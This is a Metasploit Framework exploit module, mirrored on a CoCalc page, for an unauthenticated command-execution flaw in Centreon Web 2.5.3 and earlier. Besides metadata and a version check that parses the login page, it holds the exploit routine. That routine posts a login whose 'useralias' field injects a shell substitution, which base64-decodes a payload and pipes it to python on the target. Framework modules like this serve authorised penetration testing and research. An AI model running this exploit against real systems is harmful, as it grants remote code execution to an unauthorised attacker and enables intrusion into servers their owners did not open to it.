CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/centreon_useralias_exec.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  include Msf::Exploit::Remote::HttpClient

8


9
  Rank = ExcellentRanking

10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name'        => 'Centreon Web Useralias Command Execution',

15
        'Description' => %q(

16
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL

17
          errors.  This functionality can be abused for arbitrary code

18
          execution, and can be triggered via the login screen prior to

19
          authentication.

20
        ),

21
        'Author'      =>

22
          [

23
            'h00die <[email protected]>',         # module

24
            'Nicolas CHATELAIN <[email protected]>'  # discovery

25
          ],

26
        'References'  =>

27
          [

28
            [ 'EDB', '39501' ]

29
          ],

30
        'License'        => MSF_LICENSE,

31
        'Platform'       => ['python'],

32
        'Privileged'     => false,

33
        'Arch'           => ARCH_PYTHON,

34
        'Targets'        =>

35
          [

36
            [ 'Automatic Target', {}]

37
          ],

38
        'DefaultTarget' => 0,

39
        'DisclosureDate' => '2016-02-26'

40
      )

41
    )

42


43
    register_options(

44
      [

45
        Opt::RPORT(80),

46
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])

47
      ], self.class

48
    )

49
  end

50


51
  def check

52
    begin

53
      res = send_request_cgi(

54
        'uri'       => normalize_uri(target_uri.path, 'index.php'),

55
        'method'    => 'GET'

56
      )

57
      /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body

58


59
      if version && Rex::Version.new(version) <= Rex::Version.new('2.5.3')

60
        vprint_good("Version Detected: #{version}")

61
        Exploit::CheckCode::Appears

62
      else

63
        Exploit::CheckCode::Safe

64
      end

65
    rescue ::Rex::ConnectionError

66
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

67
    end

68
  end

69


70
  def exploit

71
    begin

72
      vprint_status('Sending malicious login')

73
      send_request_cgi(

74
        'uri'       => normalize_uri(target_uri.path, 'index.php'),

75
        'method'    => 'POST',

76
        'vars_post'  =>

77
        {

78
          'useralias'   => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",

79
          'password'    => Rex::Text.rand_text_alpha(5)

80
        }

81
      )

82


83
    rescue ::Rex::ConnectionError

84
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

85
    end

86
  end

87
end

88


89